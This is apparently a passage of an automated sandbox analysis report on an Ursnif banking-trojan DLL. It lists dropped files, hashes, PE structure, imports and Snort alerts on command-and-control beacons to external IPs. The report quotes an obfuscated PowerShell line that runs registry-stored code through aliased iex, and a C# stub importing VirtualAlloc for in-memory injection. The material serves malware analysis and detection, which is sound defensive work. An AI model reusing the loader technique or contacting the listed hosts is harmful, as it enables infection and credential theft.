Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0hvnxdzw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0hvnxdzw.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\CSC1476D44366854E63BD1CA8712B7CCE92.TMP

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.111804369817748
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycGak7YnqqNXPN5Dlq5J:+RI+ycuZhN6GakSNXPNnqX
MD5:	A9AAC13F45AEC38517F515F1420BB844
SHA1:	61DAF1D4987FEEDED455FA207D6031AFAABE2259
SHA-256:	242B4C09B27F6A2971A7EF716B6753A3A268DD9399A273377C8765C4F190FFE4
SHA-512:	055A51E0D52DB263BECFBA1A82BED3EA5A6152946363D01992FC97E7110758A038185081A3703C086E0F237162BF16488D78903D7D6ACF547D53A31298C26218
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.h.v.n.x.d.z.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.h.v.n.x.d.z.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSC8E8486282EA843C08CB8749684F1E69.TMP

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0936832187569197
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyOak7YnqqpPPN5Dlq5J:+RI+ycuZhNYOakSpPPNnqX
MD5:	626554E33CAFF838CB3456F63356AD17
SHA1:	03339CE3C58E71E38886253CDA0462EA0FB77D3C
SHA-256:	43FC7B06F45D0C714B523BAD14CF9AF2D32753B5927A222087AAC8EBD8314938
SHA-512:	60EEEA2DF43D34122CAA93E66EB6569A47F03ED2460FB75B13AF5B298C07DC6BFDC42CD2F1576FA41990AC1F48DEF51380EB2FC861CDCBDF34D11B19840BCE61
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.i.g.1.j.a.p.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.i.g.1.j.a.p.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES2B5B.tmp

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.967734488198009
Encrypted:	false
SSDEEP:	24:HhnW9Q3L1YzxhH3KhKdNWI+ycuZhNYOakSpPPNnq9hgd:F53WPQKd41ulva3Tq9y
MD5:	47EA204FA896EFF74F35A764FCDA2239
SHA1:	809344296B44CA4B2904DA997177BFC77C3838E3
SHA-256:	5F59516BE8D13F4D4B895008F1126C8AC4636470ED24923996B196967F58B1E5
SHA-512:	B0B9D8A6C2E8829A88B9518B34790C8674C11631894CC670ED5B26DF54326DBFB72852F8D924C0621680D930E389BAA83317588B7363763BBBF19108EB41B382
Malicious:	false
Preview:	L.....jb.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........J....c:\Users\user\AppData\Local\Temp\CSC8E8486282EA843C08CB8749684F1E69.TMP.................beT.<..8.4V.3V............4.......C:\Users\user\AppData\Local\Temp\RES2B5B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.i.g.1.j.a.p.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RESE3E.tmp

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.9909392086985362
Encrypted:	false
SSDEEP:	24:H5nW9rIXn0tHkhKdNwI+ycuZhN6GakSNXPNnq9hgd:tWIX0tWKdm1ulDa3fq9y
MD5:	5A952B21BE2225287BF36013F025A323
SHA1:	A032F64DA66EF882018032C0567B1DED6068965E
SHA-256:	8BB030DAECC8D7C0CC193D9802079C12B58B74E603D31CD8F1E0BB09AF321F45
SHA-512:	86B2D35A21618B6E7FCD38BA08B9F4B8AC4B7B40929A1C863288E370C9979ABA40545433C77AAC158531E65476E919B15247B9F7DFAAFEBE16428A2478A87C35
Malicious:	false
Preview:	L.....jb.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC1476D44366854E63BD1CA8712B7CCE92.TMP...................?E......B..D..........3.......C:\Users\user\AppData\Local\Temp\RESE3E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.h.v.n.x.d.z.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrh5g1xw.2sy.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yympvmax.25e.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\iig1japh.0.cs

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	392
Entropy (8bit):	4.988829579018284
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
MD5:	80545CB568082AB66554E902D9291782
SHA1:	D013E59DC494D017F0E790D63CEB397583DCB36B
SHA-256:	E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
SHA-512:	C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

C:\Users\user\AppData\Local\Temp\iig1japh.cmdline

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.2624571012830605
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fpCv+zxs7+AEszIWXp+N23fpCr:p37Lvkmb6KHh6+WZE8hw
MD5:	90582BBD6FECF2EEB1D68C1D3AEAA988
SHA1:	B9E28246329AA5361CCA0CB830F19A8793ED5B13
SHA-256:	C4B4F9B01A6A6CE18984707479476F446E1B716385D277E6DD3124AD51FF2A19
SHA-512:	56283D9ED90EE7A70C1DF64BB7126655585DF158A5A3659E34F60177A3CD3D99446D2A952B91017C5A59602965F7DFFE6EB26F8A881EC6010E6B15A5B406D237
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iig1japh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iig1japh.0.cs"

C:\Users\user\AppData\Local\Temp\iig1japh.dll

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.599121810883609
Encrypted:	false
SSDEEP:	24:etGSQ/u2Bg85z7xlfwZD6ngdWqtkZfJ3WI+ycuZhNYOakSpPPNnq:6hYb5hFCD6KWdJJm1ulva3Tq
MD5:	3A65EBCBAD9310214FA09ED76C2EEE82
SHA1:	B13EEF3AC3B406D8EC7864CEB3C4A0D6FFE8C00C
SHA-256:	64098B7FF694CF305939FC8E50834C9987A68BBAE436C54724C43EB3C193FB97
SHA-512:	38C189CF9A09561B5C067C3ED7E8A59E2E96ABDA6A877E31A198DEC2A8F0049CB5702C4BFAB1E41B4E60D41A7B496369FCD4F80719CCC5579DF902A66A862354
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`............3.+.....9.......K.......S...........

C:\Users\user\AppData\Local\Temp\iig1japh.out

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.327356502060016
Encrypted:	false
SSDEEP:	12:xKIR37Lvkmb6KHh6+WZE8hlKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHgE8vKaM5DqBVKVrdFAMBJTH
MD5:	1FE7D32CD430F3D281508774EF866974
SHA1:	BF68155F1B6C4F17703C93965691041644A184DD
SHA-256:	2F810628887297BCAC4B584EC05C0AFBF0DA54EC71F72F7799EFD0CAF2AA42B9
SHA-512:	19EE43F6C0E96CBF2F418E82D8A34C3D4DF6B3D33673F4259BB3F34CF40AA4EECEAEFD1704BF98AA8588011B88952506B30AC30164620BF1E4EC33E1FD76BC8D
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iig1japh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iig1japh.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Documents\20220428\PowerShell_transcript.468325.WGQFiXaw.20220428103607.txt

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1359
Entropy (8bit):	5.402787818446981
Encrypted:	false
SSDEEP:	24:BxSA6xvBn0x2DOXUWTxBLCHt24qWhaHjeTKKjX4CIym1ZJX6xBLCHt24xGnxSAZY:BZmvh0oO9St24tQqDYB1Z4St24WZZY
MD5:	7EA2700411697C593C63588C5832DB6C
SHA1:	C9604B80D4B03D398E92CD09E473A2D220911EB7
SHA-256:	3A74B17DC938C75BAE95B1F0DF0EED087F9D42E4C46BBC744207473E2FB035D2
SHA-512:	701B89B615D7CF1CD0B9BED9566818C371550DCF96404B618DF42FBE0017CFA147C20223BA493144536BD96AA984C8E5B5C62ABEBD12D8ADDA4FAD9C79C72FDF
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220428103608..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 468325 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6608..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220428103608..********************..PS>new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.098003438778268
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3r0Cgcbr8c.dll
File size:	618496
MD5:	9c2ba02350538f6a4392c85f44550949
SHA1:	bf9d4375e2ad199794db8fb4887b148dc628b4f9
SHA256:	4216810c4c1d5c0ef229668e1b7180a02610369674a2b9af93fbc9854eaccfa7
SHA512:	5b85ec7a24135e6acea56b77c4d41ad3fad94fe3658994b0322681ac7a2027354fae349aa26297b624175f8b40a1624f3fa4a5eadf1ed6bbf9b6c2d1edf4d355
SSDEEP:	6144:ikJ+L6r9rRPtmE1cbedjdgVZljLg1RKmXL0Am6AZjJrabuFGGGGGGGGHGGGGGGGK:xZxrRPtxMExmZ1gn0TjJMk
TLSH:	FAD4F144843039A6CC06F33A4291C1675A14762D933BB0DF35E43F5FBA5A5EADAB0B78
File Content Preview:	MZ......................@...................................,...........!..L.!This program cannot be run in DOS mode....$........I.R.(n..(n..(n......(n..z...(n..P...(n.fLj..(n..vl..(n..z...(n..P...(n.._...(n..z...(n..z...(n......(n.fLk..(n..z...(n..z...(n

File Icon


Icon Hash:	9068eccc64f6e2ad

Static PE Info

General

Entrypoint:	0x401023
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	928e2ff757fbe1899e9ee7be5124aa26

Entrypoint Preview

Instruction
jmp 00007F69DCAEF6FDh
jmp 00007F69DCB1FE98h
jmp 00007F69DCAEF443h
jmp 00007F69DCAEF0BEh
jmp 00007F69DCAEF4C9h
jmp 00007F69DCAEEF14h
jmp 00007F69DCB252AFh
jmp 00007F69DCAEF01Ah
jmp 00007F69DCB187B5h
jmp 00007F69DCB28510h
jmp 00007F69DCB2415Bh
jmp 00007F69DCB29626h
jmp 00007F69DCAEEFA1h
jmp 00007F69DCB1995Ch
jmp 00007F69DCB2BB87h
jmp 00007F69DCB23092h
jmp 00007F69DCB1A98Dh
jmp 00007F69DCB2DD68h
jmp 00007F69DCAEF193h
jmp 00007F69DCB2A8AEh
jmp 00007F69DCB20F89h
jmp 00007F69DCB1B9A4h
jmp 00007F69DCB2A6EFh
jmp 00007F69DCAEF42Ah
jmp 00007F69DCB262D5h
jmp 00007F69DCB1DD90h
jmp 00007F69DCB2DC4Bh
jmp 00007F69DCB1CCE6h
jmp 00007F69DCAEF421h
jmp 00007F69DCAEEF7Ch
jmp 00007F69DCB27407h
jmp 00007F69DCB2CBA2h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[IMP] VS2012 UPD4 build 61030
[ C ] VS2013 UPD2 build 30501
[IMP] VS2013 UPD3 build 30723
[IMP] VS2010 SP1 build 40219
[C++] VS2013 build 21005
[RES] VS2008 build 21022
[IMP] VS2013 build 21005
[LNK] VS2015 UPD3.1 build 24215
[EXP] VS2008 build 21022
[ C ] VS2013 UPD3 build 30723
[C++] VS2017 v15.5.4 build 25834
[RES] VS2013 build 21005
[ C ] VS2017 v15.5.4 build 25834

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a000	0xa0	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8b000	0xc100	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0xfe0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x40000	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8a2b0	0x210	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x1000	0x1	.text
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3ef30	0x3f000	False	0.375992063492	data	4.45674705156	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x40000	0x3fa8a	0x40000	False	0.815296173096	data	7.22837563201	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x80000	0x93b7	0x7000	False	0.321881975446	data	5.41614354134	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x8a000	0x9ab	0x1000	False	0.207763671875	data	2.53154389782	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x8b000	0xc100	0xd000	False	0.465106670673	data	5.38059585556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x98000	0x17a0	0x2000	False	0.236572265625	data	3.87012606078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x8b510	0x666	data	English	United States
RT_ICON	0x8bb78	0x485d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x903d8	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544	English	United States
RT_ICON	0x92980	0xea8	data	English	United States
RT_ICON	0x93828	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x940d0	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x94638	0xb4	data	English	United States
RT_DIALOG	0x946f0	0x120	data	English	United States
RT_DIALOG	0x94810	0x158	data	English	United States
RT_DIALOG	0x94968	0x202	data	English	United States
RT_DIALOG	0x94b70	0xf8	data	English	United States
RT_DIALOG	0x94c68	0xa0	data	English	United States
RT_DIALOG	0x94d08	0xee	data	English	United States
RT_GROUP_ICON	0x94df8	0x4c	data	English	United States
RT_VERSION	0x94e48	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
OLEAUT32.dll	GetRecordInfoFromTypeInfo, LoadTypeLibEx
USER32.dll	GetClassNameA, GetPropW, LoadMenuA, GetMessageW, GetClientRect, GetUpdateRgn, DefMDIChildProcW, GetMessagePos, GetMenuItemRect, MessageBoxIndirectW, GetQueueStatus, GetScrollBarInfo, DeleteMenu
mscms.dll	GetColorDirectoryW
KERNEL32.dll	GetBinaryTypeA, GetModuleFileNameA, GetModuleHandleW, DebugBreak, GetStringTypeA, GlobalMemoryStatus, WriteProcessMemory, GetCommTimeouts, GetConsoleCP, EnumResourceTypesA, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetLargestConsoleWindowSize, EraseTape, GetDiskFreeSpaceExA, lstrlenA
GDI32.dll	GetCharWidthA, GetTextCharacterExtra, GetCharWidth32A, GetCharWidthFloatA, GetTextMetricsW, ExtSelectClipRgn, GetBkColor, GdiComment
msvcrt.dll	srand, strcoll, fgetwc
ADVAPI32.dll	RegGetValueA, GetFileSecurityA, EnumServicesStatusExW, InitiateSystemShutdownExW

Version Infos

Description	Data
LegalCopyright	A Company. All rights reserved.
InternalName
FileVersion	1.0.0.0
CompanyName	A Company
ProductName
ProductVersion	1.0.0.0
FileDescription
OriginalFilename	myfile.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/28/22-10:35:34.699978 04/28/22-10:35:34.699978	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49750	80	192.168.2.3	13.107.42.16
04/28/22-10:35:54.821196 04/28/22-10:35:54.821196	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49755	80	192.168.2.3	94.140.115.8
04/28/22-10:35:55.836318 04/28/22-10:35:55.836318	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49755	80	192.168.2.3	94.140.115.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 28, 2022 10:35:54.744678020 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:54.813708067 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:54.815269947 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:54.821196079 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:54.888710022 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.231856108 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.231884003 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.231899977 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.231918097 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.231934071 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.231950998 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.231964111 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.232043028 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.232093096 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.232137918 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.232155085 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.232172012 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.232248068 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.301222086 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301249981 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301264048 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301276922 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301290989 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301302910 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301369905 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301408052 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301423073 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.301466942 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.301475048 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:55.301506996 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:55.301523924 CEST	80	49755	94.140.115.8	192.168.2.3
